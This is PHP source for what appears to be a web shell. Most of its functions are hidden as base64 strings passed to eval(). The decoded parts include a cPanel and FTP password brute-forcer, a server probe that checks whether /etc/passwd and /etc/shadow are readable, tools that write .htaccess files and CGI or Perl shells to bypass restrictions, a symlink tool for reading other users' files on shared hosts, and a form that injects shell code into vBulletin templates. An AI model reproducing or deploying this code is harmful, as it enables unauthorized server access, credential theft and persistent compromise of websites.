$tkl = "CiRjcGFuZWxfcG9ydD0iMjA4MiI7CiRjb25uZWN0X3RpbWVvdXQ9NTsKQGVycm9yX3JlcG9ydGluZygwKTsKc2V0X3RpbWVfbGltaXQoMCk7CiRzdWJtaXQ9JF9SRVFVRVNUWydzdWJtaXQnXTsKJHVzZXJzPSRfUkVRVUVTVFsndXNlcnMnXTsKJHBhc3M9JF9SRVFVRVNUWydwYXNzd29yZHMnXTsKJHRhcmdldD0kX1JFUVVFU1RbJ3RhcmdldCddOwokY3JhY2t0eXBlPSRfUkVRVUVTVFsnY3JhY2t0eXBlJ107CiR0YXJnZXQgPSAibG9jYWxob3N0IjsKCmVjaG8nCjxmb3JtICBtZXRob2Q9IlBPU1QiPgpVc2VycyBsaXN0ICZuYnNwOyAmbmJzcDsgJm5ic3A7ICAmbmJzcDsgJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyAmbmJzcDsmbmJzcDsmbmJzcDtQYXNzd29yZCBsaXN0PGJyPgo8dGV4dGFyZWEgcm93cz0iMjAiIG5hbWU9InVzZXJzIiBjb2xzPSIyNSI+Jy4kdXNlcnMuJzwvdGV4dGFyZWE+PHRleHRhcmVhIHJvd3M9IjIwIiBuYW1lPSJwYXNzd29yZHMiIGNvbHM9IjI1Ij4nLiRwYXNzLic8L3RleHRhcmVhPjxicj4KClNlbGVjdCBCcnV0ZWZvcmNlIFR5cGUgOiA8YnIvPjxwPgo8c2VsZWN0IG5hbWU9ImNyYWNrdHlwZSI+CjxvcHRpb24gdmFsdWU9ImNwYW5lbCI+Q1BhbmVsIENyYWNrPC9vcHRpb24+CjxvcHRpb24gdmFsdWU9ImZ0cCI+RlRQIENyYWNrPC9vcHRpb24+Cjwvc2VsZWN0Pgo8YnI+PCEtLVQuSy5MLS0+PGJyPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJDcmFjayIgbmFtZT0ic3VibWl0Ii8+CjwvcD48L2Zvcm0+JzsKCQkKaWYgKCRfUE9TVFsnY3JhY2t0eXBlJ109PSdmdHAnKXsKZnVuY3Rpb24gYnJ1dGUoKQp7CglnbG9iYWwgJHZhbHMsJG1pbl9sZW5ndGgsJG1heF9sZW5ndGg7CglnbG9iYWwgJHRhcmdldCwkcHVyZXVzZXIsJGNvbm5lY3RfdGltZW91dDsKCSRtaW49JG1pbl9sZW5ndGg7CgkkbWF4PSRtYXhfbGVuZ3RoOwoJJEEgPSBhcnJheSgpOwoJJG51bVZhbHMgPSBjb3VudCgkdmFscyk7CgkkaW5jRG9uZSA9ICIiOwoJJHJlYWxNYXggPSAiIjsKCSRjdXJyZW50VmFsID0gIiI7CgkkZmlyc3RWYWwgPSAiIjsKCWZvciAoJGkgPSAwOyAkaSA8ICgkbWF4ICsgMSk7ICRpKyspIHsKCQkkQVskaV0gPSAtMTsKCX0KCQoJZm9yICgkaSA9IDA7ICRpIDwgJG1heDsgJGkrKykgewoJCSRyZWFsTWF4ID0gJHJlYWxNYXggLiAkdmFsc1skbnVtVmFscyAtIDFdOwoJfQoJZm9yICgkaSA9IDA7ICRpIDwgJG1pbjsgJGkrKykgewoJCSRBWyRpXSA9ICR2YWxzWzBdOwoJfQoJJGkgPSAwOwoJd2hpbGUgKCRBWyRpXSAhPSAtMSkgewoJCSRmaXJzdFZhbCAuPSAkQVskaV07CgkJJGkrKzsKCX0KCWNwYW5lbF9jaGVjaygkdGFyZ2V0LCRwdXJldXNlciwkZmlyc3RWYWwsJGNvbm5lY3RfdGltZW91dCk7CgkKCXdoaWxlICgxKSB7CgkJZm9yICgkaSA9IDA7ICRpIDwgKCRtYXggKyAxKTsgJGkrKykgewoJCQlpZiAoJEFbJGldID09IC0xKSB7CgkJCQlicmVhazsKCQkJfQoJCX0KCQkkaS0tOwoJCSRpbmNEb25lID0gMDsKCQl3aGlsZSAoISRpbmNEb25lKSB7CQoJCQlmb3IgKCRqID0gMDsgJGogPCAkbnVtVmFsczsgJGorKykgewoJCQkJaWYgKCRBWyRpXSA9PSAkdmFsc1skal0pIHsKCQkJCQlicmVhazsKCQkJCX0KCQkJfQoJCQlpZiAoJGogPT0gKCRudW1WYWxzIC0gMSkpIHsKCQkJCSRBWyRpXSA9ICR2YWxzWzBdOwoJCQkJJGktLTsKCQkJCWlmICgkaSA8IDApIHsKCQkJCQlmb3IgKCRpID0gMDsgJGkgPCAoJG1heCArIDEpOyAkaSsrKSB7CgkJCQkJCWlmICgkQVskaV0gPT0gLTEpIHsKCQkJCQkJCWJyZWFrOwoJCQkJCQl9CgkJCQkJfQoJCQkJCSRBWyRpXSA9ICR2YWxzWzBdOwoJCQkJCSRBWyRpICsgMV0gPSAtMTsKCQkJCQkkaW5jRG9uZSA9IDE7CgkJCQkJcHJpbnQgIlN0YXJ0aW5nICIgLiAoc3RybGVuKCRjdXJyZW50VmFsKSArIDEpIC4gIiBDaGFyYWN0ZXJzIENyYWNraW5nPGJyPiI7CgkJCQl9CgkJCX0gZWxzZSB7CgkJCQkkQVskaV0gPSAkdmFsc1skaiArIDFdOwoJCQkJJGluY0RvbmUgPSAxOwoJCQl9CgkJfQoJCSRpID0gMDsKCQkkY3VycmVudFZhbCA9ICIiOwoJCXdoaWxlICgkQVskaV0gIT0gLTEpIHsKCQkJJGN1cnJlbnRWYWwgPSAkY3VycmVudFZhbCAuICRBWyRpXTsKCQkJJGkrKzsKCQl9CgkJY3BhbmVsX2NoZWNrKCR0YXJnZXQsJHB1cmV1c2VyLCRjdXJyZW50VmFsLCRjb25uZWN0X3RpbWVvdXQpOwoJCWlmICgkY3VycmVudFZhbCA9PSAkcmVhbE1heCkgewoJCQlyZXR1cm4gMDsKCQl9Cgl9Cn0KZnVuY3Rpb24gZ2V0bWljcm90aW1lKCkgewogICBsaXN0KCR1c2VjLCAkc2VjKSA9IGV4cGxvZGUoIiAiLG1pY3JvdGltZSgpKTsKICAgcmV0dXJuICgoZmxvYXQpJHVzZWMgKyAoZmxvYXQpJHNlYyk7Cn0gCgpmdW5jdGlvbiBmdHBfY2hlY2soJGhvc3QsJHVzZXIsJHBhc3MsJHRpbWVvdXQpCnsKICRjaCA9IGN1cmxfaW5pdCgpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImZ0cDovLyRob3N0Iik7CiBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hUVFBBVVRILCBDVVJMQVVUSF9CQVNJQyk7CiBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRlRQTElTVE9OTFksIDEpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VTRVJQV0QsICIkdXNlcjokcGFzcyIpOwogY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgJHRpbWVvdXQpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZBSUxPTkVSUk9SLCAxKTsKICRkYXRhID0gY3VybF9leGVjKCRjaCk7CiBpZiAoIGN1cmxfZXJybm8oJGNoKSA9PSAyOCApCiB7CiBwcmludCAiWy1dRXJyb3IgOiBDb25uZWN0aW9uIFRpbWVvdXQiO2V4aXQ7CiB9CiBlbHNlIGlmICggY3VybF9lcnJubygkY2gpID09IDAgKQogewogIHByaW50ICI8YnI+WytdQnJ1dGVmb3JjZSB
|
||
|
eval(base64_decode($tkl));
|
||
|
exit;
|
||
|
case "Server-Info":
|
||
|
$tkl = "ICAkc2FmZV9zdGF0X3RrbCA9IGluaV9nZXQgKCJzYWZlX21vZGUiKTsgaWYgKCRzYWZlX3N0YXRfdGtsID09IDApICAgeyAkc2FmZV9zdGF0ID0gJ09GRic7IH0gZWxzZSB7ICRzYWZlX3N0YXQgPSAnT048YSBocmVmPSI/Z2F6YT1pbmkiPiBbQ3JlYXRlIHBocC5pbmldPC9hPic7IH0gICBpZighZnVuY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRlZ2lkJykpIHsgCQkkdXNlciA9IEBnZXRfY3VycmVudF91c2VyKCk7IAkJJHVpZCA9IEBnZXRteXVpZCgpOyAJCSRnaWQgPSBAZ2V0bXlnaWQoKTsgCQkkZ3JvdXAgPSAiPyI7IAl9IGVsc2UgeyAJCSR1aWQgPSBAcG9zaXhfZ2V0cHd1aWQocG9zaXhfZ2V0ZXVpZCgpKTsgCQkkZ2lkID0gQHBvc2l4X2dldGdyZ2lkKHBvc2l4X2dldGVnaWQoKSk7IAkJJHVzZXIgPSAkdWlkWyduYW1lJ107IAkJJHVpZCA9ICR1aWRbJ3VpZCddOyAJCSRncm91cCA9ICRnaWRbJ25hbWUnXTsgCQkkZ2lkID0gJGdpZFsnZ2lkJ107IAl9IGVjaG8gJ0hvc3QgOiAnLiRfU0VSVkVSWyJIVFRQX0hPU1QiXS4nPGJyPic7IGVjaG8gJ3BocCA6ICcucGhwdmVyc2lvbigpLic8YnI+JzsgZWNobyAnc2FmZSBtb2RlIDogJy4kc2FmZV9zdGF0Lic8YnI+JzsgZWNobyAnY3dkIDogJy5nZXRjd2QoKS4nPGJyPic7CSBlY2hvICAnVW5hbWU6ICcuc3Vic3RyKEBwaHBfdW5hbWUoKSwgMCwgMTIwKS4nPGJyPicgOyBlY2hvICAnVXNlcjogJyAuICR1aWQgLiAnICggJyAuICR1c2VyIC4gJyApICcgLiAkZ2lkIC4gJyAoICcgLiAkZ3JvdXAgLiAnICk8YnI+JzsgZWNobyAnU2VydmVyIElQOiAnIC4gQCRfU0VSVkVSWyJTRVJWRVJfQUREUiJdIC4gJzxicj5DbGllbnQgSVA6ICcgLiAkX1NFUlZFUlsnUkVNT1RFX0FERFInXS4nPGJyPistLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSs8YnI+JyA7IGZ1bmN0aW9uIHRrbF9zZWMoJG4sICR2KSB7IAkJJHYgPSB0cmltKCR2KTsgCQlpZigkdikgeyAJCQllY2hvICc8c3Bhbj4nIC4gJG4gLiAnOiA8L3NwYW4+JzsgCQkJaWYoc3RycG9zKCR2LCAiXG4iKSA9PT0gZmFsc2UpIAkJCQllY2hvICR2IC4gJzxicj48YnI+JzsgCQkJZWxzZSAJCQkJZWNobyAnPHByZSBjbGFzcz1tbDE+JyAuICR2IC4gJzwvcHJlPic7IAkJfSAJfSAJdGtsX3NlYygnU2VydmVyIHNvZnR3YXJlJywgQGdldGVudignU0VSVkVSX1NPRlRXQVJFJykpOyAgICAgaWYoZnVuY3Rpb25fZXhpc3RzKCdhcGFjaGVfZ2V0X21vZHVsZXMnKSkgICAgICAgICB0a2xfc2VjKCdMb2FkZWQgQXBhY2hlIG1vZHVsZXMnLCBpbXBsb2RlKCcsICcsIGFwYWNoZV9nZXRfbW9kdWxlcygpKSk7IAl0a2xfc2VjKCdEaXNhYmxlZCBQSFAgRnVuY3Rpb25zJywgJEdMT0JBTFNbJ2Rpc2FibGVfZnVuY3Rpb25zJ10/JEdMT0JBTFNbJ2Rpc2FibGVfZnVuY3Rpb25zJ106J25vbmUnKTsgCXRrbF9zZWMoJ09wZW4gYmFzZSBkaXInLCBAaW5pX2dldCgnb3Blbl9iYXNlZGlyJykpOyAJdGtsX3NlYygnU2FmZSBtb2RlIGV4ZWMgZGlyJywgQGluaV9nZXQoJ3NhZmVfbW9kZV9leGVjX2RpcicpKTsgCXRrbF9zZWMoJ1NhZmUgbW9kZSBpbmNsdWRlIGRpcicsIEBpbmlfZ2V0KCdzYWZlX21vZGVfaW5jbHVkZV9kaXInKSk7IAl0a2xfc2VjKCdjVVJMIHN1cHBvcnQnLCBmdW5jdGlvbl9leGlzdHMoJ2N1cmxfdmVyc2lvbicpPydlbmFibGVkJzonbm8nKTsgCSR0ZW1wPWFycmF5KCk7IAlpZihmdW5jdGlvbl9leGlzdHMoJ215c3FsX2dldF9jbGllbnRfaW5mbycpKSAJCSR0ZW1wW10gPSAiTXlTcWwgKCIubXlzcWxfZ2V0X2NsaWVudF9pbmZvKCkuIikiOyAJaWYoZnVuY3Rpb25fZXhpc3RzKCdtc3NxbF9jb25uZWN0JykpIAkJJHRlbXBbXSA9ICJNU1NRTCI7IAlpZihmdW5jdGlvbl9leGlzdHMoJ3BnX2Nvbm5lY3QnKSkgCQkkdGVtcFtdID0gIlBvc3RncmVTUUwiOyAJaWYoZnVuY3Rpb25fZXhpc3RzKCdvY2lfY29ubmVjdCcpKSAJCSR0ZW1wW10gPSAiT3JhY2xlIjsgCXRrbF9zZWMoJ1N1cHBvcnRlZCBkYXRhYmFzZXMnLCBpbXBsb2RlKCcsICcsICR0ZW1wKSk7IAllY2hvICc8YnI+JzsgCWlmKCRHTE9CQUxTWydvcyddID09ICduaXgnKSB7IAkJdGtsX3NlYygnUmVhZGFibGUgL2V0Yy9wYXNzd2QnLCBAaXNfcmVhZGFibGUoJy9ldGMvcGFzc3dkJyk/InllcyA8YSBocmVmPScjJyBvbmNsaWNrPSdnKFwiRmlsZXNUb29sc1wiLCBcIi9ldGMvXCIsIFwicGFzc3dkXCIpJz5bZ29dPC9hPiI6J25vJyk7IAkJdGtsX3NlYygnUmVhZGFibGUgL2V0Yy9zaGFkb3cnLCBAaXNfcmVhZGFibGUoJy9ldGMvc2hhZG93Jyk/InllcyA8YSBocmVmPScjJyBvbmNsaWNrPSdnKFwiRmlsZXNUb29sc1wiLCBcImV0Y1wiLCBcInNoYWRvd1wiKSc+W2dvXTwvYT4iOidubycpOyAJCXRrbF9zZWMoJ1JlYWRhYmxlIC9ldGMvc2hhZG93JywgQGlzX3JlYWRhYmxlKCcvZXRjL3NoYWRvdycpPyJ5ZXMgPGEgaHJlZj0nIycgb25jbGljaz0nZyhcIkZpbGVzVG9vbHNcIiwgXCJldGNcIiwgXCJzaGFkb3dcIiknPltnb108L2E+Ijonbm8nKTsgCQl0a2xfc2VjKCdSZWFkYWJsZSAvZXRjL3NoYWRvdycsIEBpc19yZWFkYWJsZSgnL2V0Yy9zaGFkb3cnKT8ieWVzIDxhIGhyZWY9JyMnIG9uY2xpY2s9J2coXCJGaWxlc1Rvb2xzXCIsIFwiZXRjXCIsIFwic2hhZG93XCIpJz5bZ29dPC9hPiI6J25vJyk7IAkJdGtsX3NlYygnUmVhZGFibGUgL2V0Yy9zaGFkb3cnLCBAaXNfcmVhZGFibGUoJy9ldGMvc2hhZG93Jyk/InllcyA8YSBocmVmPScjJyBvbmNsaWNrPSdnKFwiRmlsZXNUb29sc1wiLCBcImV0Y1wiLCBcInNoYWRvd1wiKSc+W2dvXTwvYT4iOidubycpOyAJCXRrbF9zZWMoJ1JlYWRhYmxlIC9ldGMvc2hhZG93JywgQGlzX3JlYWRhYmxlKCcvZXRjL3NoYWRvdycpPyJ5ZXMgPGEgaHJlZj0nIycgb25jbGljaz0nZyhcIkZpbGVzVG9vbHNcIiwgXCJldGNcIiwgXCJzaGFkb3dcIiknPltnb108L2E+Ijonbm8nKTsgCQl0a2xfc2VjKCdPUyB2ZXJzaW9uJywgQGZpbGVfZ2V0X2NvbnRlbnRzKCcvcHJvYy92ZXJzaW9uJykpOyAJCXRrbF9zZWMoJ0Rpc3RyIG5hbWUnLCBAZmlsZV9nZXRfY29udGVudHMoJy9ldGMvaXNzdWU
|
||
|
eval(base64_decode($tkl));
|
||
|
exit;
|
||
|
case "bypass":
|
||
|
$tkl = "QG1rZGlyKCdieXBhc3MnKTsKZWNobyAiPC9icj4gU2VsZWN0IGJ5cGFzcyBUb29sIDo8L2JyPgo8Zm9ybSBtZXRob2Q9J1BPU1QnID4JCQk8cD4KPHNlbGVjdCBuYW1lPSdieXBhc3NfdHlwZSc+CjxvcHRpb24gdmFsdWU9J0NnaV9TaGVsbCc+Q2dpIFNoZWxsPC9vcHRpb24+CjxvcHRpb24gdmFsdWU9J01pbmlfQ2dpJz5NaW5pIENnaTwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSdDb25maWdfU2hlbGwnPkNvbmZpZyBTaGVsbDwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSdQeXRob25fU2hlbGwnPlB5dGhvbiBTaGVsbDwvb3B0aW9uPgo8L3NlbGVjdD4KPGlucHV0IHR5cGU9J3N1Ym1pdCcgdmFsdWU9J2dvID4+JyAvPgo8L3A+PC9mb3JtPiI7CiRkb2R5X3RrbCA9ICRfUE9TVFsnYnlwYXNzX3R5cGUnXTsKc3dpdGNoICgkZG9keV90a2wpIHsKY2FzZSAiQ2dpX1NoZWxsIjoKICAgIEBta2RpcignYnlwYXNzL2NnaV9zaGVsbCcsIDA3NTUpOwogICAgY2hkaXIoJ2J5cGFzcy9jZ2lfc2hlbGwnKTsgICAgICAKICAgICAgICAkdGtsID0gIi5odGFjY2VzcyI7CiAgICAgICAgJHRrbF9ub3RlID0gIiR0a2wiOwogICAgICAgICRkb2R5ID0gZm9wZW4gKCR0a2xfbm90ZSAsICd3Jykgb3IgZGllICgiZG9keSBhJiMyMzE7JiMzMDU7bGFtYWQmIzMwNTshIik7CiAgICAgICAgJG1ldGluID0gIlQzQjBhVzl1Y3lCR2IyeHNiM2RUZVcxTWFXNXJjeUJOZFd4MGFWWnBaWGR6SUVsdVpHVjRaWE1nUlhobFkwTkhTUXBCWkdSVWVYQmxJR0Z3Y0d4cFkyRjBhVzl1TDNndGFIUjBjR1F0WTJkcElDNWphVzRLUVdSa1NHRnVaR3hsY2lCaloya3RjMk55YVhCMElDNWphVzRLUVdSa1NHRnVaR3hsY2lCaloya3RjMk55YVhCMElDNWphVzQ9IjsgICAgCiAgICAgICAgZndyaXRlICggJGRvZHkgLCBiYXNlNjRfZGVjb2RlKCRtZXRpbikgKSA7CiAgICAgICAgZmNsb3NlICgkZG9keSk7CiRjZ2lzaGVsbGl6b2NpbiA9ICdJeUV2ZFhOeUwySnBiaTl3WlhKc0lDMUpMM1Z6Y2k5c2IyTmhiQzlpWVc1a2JXRnBiZzBLSXkwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUTBLSXlBOFlpQnpkSGxzWlQwaVkyOXNiM0k2WW14aFkyczdZbUZqYTJkeWIzVnVaQzFqYjJ4dmNqb2pabVptWmpZMklqNXdjbWwyT0NCaloya2djMmhsYkd3OEwySStJQ01nYzJWeWRtVnlEUW9qTFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHREUW9OQ2lNdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzBOQ2lNZ1EyOXVabWxuZFhKaGRHbHZiam9nV1c5MUlHNWxaV1FnZEc4Z1kyaGhibWRsSUc5dWJIa2dKRkJoYzNOM2IzSmtJR0Z1WkNBa1YybHVUbFF1SUZSb1pTQnZkR2hsY2cwS0l5QjJZV3gxWlhNZ2MyaHZkV3hrSUhkdmNtc2dabWx1WlNCbWIzSWdiVzl6ZENCemVYTjBaVzF6TGcwS0l5MHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFEwS0pGQmhjM04zYjNKa0lEMGdJbkJ5YVhZNElqc0pDU01nUTJoaGJtZGxJSFJvYVhNdUlGbHZkU0IzYVd4c0lHNWxaV1FnZEc4Z1pXNTBaWElnZEdocGN3MEtDUWtKQ1NNZ2RHOGdiRzluYVc0dURRb05DaVJYYVc1T1ZDQTlJREE3Q1FrSkl5QlpiM1VnYm1WbFpDQjBieUJqYUdGdVoyVWdkR2hsSUhaaGJIVmxJRzltSUhSb2FYTWdkRzhnTVNCcFpnMEtDUWtKQ1NNZ2VXOTFKM0psSUhKMWJtNXBibWNnZEdocGN5QnpZM0pwY0hRZ2IyNGdZU0JYYVc1a2IzZHpJRTVVRFFvSkNRa0pJeUJ0WVdOb2FXNWxMaUJKWmlCNWIzVW5jbVVnY25WdWJtbHVaeUJwZENCdmJpQlZibWw0TENCNWIzVU5DZ2tKQ1FraklHTmhiaUJzWldGMlpTQjBhR1VnZG1Gc2RXVWdZWE1nYVhRZ2FYTXVEUW9OQ2lST1ZFTnRaRk5sY0NBOUlDSW1JanNKQ1NNZ1ZHaHBjeUJqYUdGeVlXTjBaWElnYVhNZ2RYTmxaQ0IwYnlCelpYQmxjbUYwWlNBeUlHTnZiVzFoYm1SekRRb0pDUWtKSXlCcGJpQmhJR052YlcxaGJtUWdiR2x1WlNCdmJpQlhhVzVrYjNkeklFNVVMZzBLRFFva1ZXNXBlRU50WkZObGNDQTlJQ0k3SWpzSkNTTWdWR2hwY3lCamFHRnlZV04wWlhJZ2FYTWdkWE5sWkNCMGJ5QnpaWEJsY21GMFpTQXlJR052YlcxaGJtUnpEUW9KQ1FrSkl5QnBiaUJoSUdOdmJXMWhibVFnYkdsdVpTQnZiaUJWYm1sNExnMEtEUW9rUTI5dGJXRnVaRlJwYldWdmRYUkVkWEpoZEdsdmJpQTlJREV3T3draklGUnBiV1VnYVc0Z2MyVmpiMjVrY3lCaFpuUmxjaUJqYjIxdFlXNWtjeUIzYVd4c0lHSmxJR3RwYkd4bFpBMEtDUWtKQ1NNZ1JHOXVKM1FnYzJWMElIUm9hWE1nZEc4Z1lTQjJaWEo1SUd4aGNtZGxJSFpoYkhWbExpQlVhR2x6SUdsekRRb0pDUWtKSXlCMWMyVm1kV3dnWm05eUlHTnZiVzFoYm1SeklIUm9ZWFFnYldGNUlHaGhibWNnYjNJZ2RHaGhkQTBLQ1FrSkNTTWdkR0ZyWlNCMlpYSjVJR3h2Ym1jZ2RHOGdaWGhsWTNWMFpTd2diR2xyWlNBaVptbHVaQ0F2SWk0TkNna0pDUWtqSUZSb2FYTWdhWE1nZG1Gc2FXUWdiMjVzZVNCdmJpQlZibWw0SUhObGNuWmxjbk11SUVsMElHbHpEUW9KQ1FrSkl5QnBaMjV2Y21Wa0lHOXVJRTVVSUZObGNuWmxjbk11RFFvTkNpUlRhRzkzUkhsdVlXMXBZMDkxZEhCMWRDQTlJREU3Q1FraklFbG1JSFJvYVhNZ2FYTWdNU3dnZEdobGJpQmtZWFJoSUdseklITmxiblFnZEc4Z2RHaGxEUW9KQ1FrSkl5QmljbTkzYzJWeUlHRnpJSE52YjI0Z1lYTWdhWFFnYVhNZ2IzVjBjSFYwTENCdmRHaGxjbmRwYzJVTkNna0pDUWtqSUdsMElHbHpJR0oxWm1abGNtVmtJR0Z1WkNCelpXNWtJSGRvWlc0Z2RHaGxJR052YlcxaGJtUU5DZ2tKQ1FraklHTnZiWEJzWlhSbGN5NGdWR2hwY3lCcGN5QjFjMlZtZFd3Z1ptOXlJR052Ylc
|
||
|
eval(base64_decode($tkl));
|
||
|
exit;
|
||
|
case "symlink":
|
||
|
$tkl = "ICBAc2V0X3RpbWVfbGltaXQoMCk7IEBta2RpcigndGtsJywwNzc3KTsgJElJSUlJSUlJSUlsMSAgPSAiT3B0aW9ucyBhbGwgXG4gRGlyZWN0b3J5SW5kZXggZ2F6YS5odG1sIFxuIEFkZFR5cGUgdGV4dC9wbGFpbiAucGhwIFxuIEFkZEhhbmRsZXIgc2VydmVyLXBhcnNlZCAucGhwIFxuICBBZGRUeXBlIHRleHQvcGxhaW4gLmh0bWwgXG4gQWRkSGFuZGxlciB0eHQgLmh0bWwgXG4gUmVxdWlyZSBOb25lIFxuIFNhdGlzZnkgQW55IjsgJElJSUlJSUlJSUkxSSA9QGZvcGVuICgndGtsLy5odGFjY2VzcycsJ3cnKTsgZndyaXRlKCRJSUlJSUlJSUlJMUkgLCRJSUlJSUlJSUlJbDEpOyAgZWNobyAnICA8YnIgLz48YnIgLz4gPGZvcm0gbWV0aG9kPSJwb3N0Ij4gRmlsZSBQYXRoOjxiciAvPiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZmlsZSIgdmFsdWU9Ii9ob21lL2dhemFoYWNrL3B1YmxpY19odG1sL2NvbmZpZy5waHAiIHNpemU9IjYwIi8+IDxicj5TeW1saW5rIE5hbWU8YnI+IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJzeW1maWxlIiB2YWx1ZT0iZ2F6YS50eHQiIHNpemU9IjYwIi8+PGJyIC8+PGJyIC8+IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJzeW1saW5rIiBuYW1lPSJzeW1saW5rIiAvPiA8YnIgLz48YnIgLz4gPC9mb3JtPiAnOyAkSUlJSUlJSUkxbElsID0gJF9QT1NUWydmaWxlJ107ICRzeW1maWxlID0gJF9QT1NUWydzeW1maWxlJ107ICRzeW1saW5rID0gJF9QT1NUWydzeW1saW5rJ107IGlmICgkc3ltbGluaykgeyBAc3ltbGluaygiJElJSUlJSUlJMWxJbCIsInRrbC8kc3ltZmlsZSIpOyBlY2hvICc8YnIgLz48YSB0YXJnZXQ9Il9ibGFuayIgaHJlZj0idGtsLycuJHN5bWZpbGUuJyIgPj09PT4nLiRzeW1maWxlLic8PT09PC9hPic7IH0gIEBzeW1saW5rKCcvJywndGtsL3Jvb3QnKTsgICRJSUlJSUlJSUlsbEkgPSBAZmlsZSgnL2V0Yy9uYW1lZC5jb25mJyk7IGlmKCEkSUlJSUlJSUlJbGxJKSB7IGRpZSAoIiBjYW4ndCByZWFkIC9ldGMvbmFtZWQuY29uZiIpOyB9IGVsc2UgeyAgICAgZWNobyAiPGRpdiBjbGFzcz0ndG1wJz48dGFibGUgIHdpZHRoPSc0MCUnPjx0ZD5Eb21haW5zPC90ZD48dGQ+VXNlcnMgJiBzeW1saW5rPC90ZD4iOyBmb3JlYWNoKCRJSUlJSUlJSUlsbEkgYXMgJElJSUlJSUlJSWxsMSl7IGlmKGVyZWdpKCd6b25lJywkSUlJSUlJSUlJbGwxKSl7IHByZWdfbWF0Y2hfYWxsKCcjem9uZSAiKC4qKSIjJywkSUlJSUlJSUlJbGwxLCRJSUlJSUlJSUlsMTEpOyBmbHVzaCgpOyBpZihzdHJsZW4odHJpbSgkSUlJSUlJSUlJbDExWzFdWzBdKSkgPjIpeyAkSUlJSUlJSUlJMUkxID0gcG9zaXhfZ2V0cHd1aWQoQGZpbGVvd25lcignL2V0Yy92YWxpYXNlcy8nLiRJSUlJSUlJSUlsMTFbMV1bMF0pKTsgJElJSUlJSUlJMUkxbCA9ICRJSUlJSUlJSUkxSTFbJ25hbWUnXSA7IEBzeW1saW5rKCcvJywndGtsL3Jvb3QnKTsgJElJSUlJSUlJMUkxbCA9ICRJSUlJSUlJSUlsMTFbMV1bMF07IGVjaG8gIiA8dHI+IDx0ZD4gPGRpdiBjbGFzcz0nZG9tJz48YSB0YXJnZXQ9J19ibGFuaycgaHJlZj1odHRwOi8vd3d3LiIuJElJSUlJSUlJSWwxMVsxXVswXS4iLz4iLiRJSUlJSUlJSTFJMWwuIiA8L2E+IDwvZGl2PiA8L3RkPiA8dGQ+IDxhIGhyZWY9J3RrbC9yb290L2hvbWUvIi4kSUlJSUlJSUlJMUkxWyduYW1lJ10uIi9wdWJsaWNfaHRtbCcgdGFyZ2V0PSdfYmxhbmsnPiIuJElJSUlJSUlJSTFJMVsnbmFtZSddLiI8L2E+ICA8L3RkPiA8L3RyPjwvZGl2PiAiOyBmbHVzaCgpOyB9IH0gfSB9";
|
||
|
eval(base64_decode($tkl));
|
||
|
exit;
|
||
|
case "vBulletin-Tool":
|
||
|
echo '<form method="GET">Select Tool : <br><p>
|
||
|
<select name="tool">
|
||
|
<option value="Inject">Shell Inject</option>
|
||
|
<option value="VBindex">Change index</option>
|
||
|
</select>
|
||
|
<input type="submit" value=">>" />
|
||
|
|
||
|
</p>
|
||
|
</form>';
|
||
|
exit;
|
||
|
case "Inject":
|
||
|
echo '
|
||
|
Shell Inject</b></p>';
|
||
|
if (empty($_POST[db])){
|
||
|
print '
|
||
|
<form name="frm" action="" method="POST" onsubmit="document.frm.code.value = encode64(document.frm.code.value)">
|
||
|
<br>
|
||
|
Inject To :<br><select size="1" name="template">
|
||
|
<option value="FAQ">FAQ.PHP</option>
|
||
|
<option value="FORUMHOME">FORUMHOME</option>
|
||
|
<option value="search_forums">search forums</option>
|
||
|
<option value="SHOWGROUPS">SHOWGROUPS</option>
|
||
|
<option value="SHOWTHREAD">SHOWTHREAD.PHP</option>
|
||
|
<option value="CALENDAR">CALENDAR.PHP</option>
|
||
|
<option value="MEMBERINFO">MEMBERINFO</option>
|
||
|
<option value="footer">footer</option>
|
||
|
<option value="header">header</option>
|
||
|
<option value="headinclude">headinclude</option>
|
||
|
<option value="lostpw">lostpw</option>
|
||
|
<option value="memberlist">memberlist</option></select></p>
|
||
|
<br> Host : <br><input name="lo" type="text" value="localhost" align="LEFT" size="18">
|
||
|
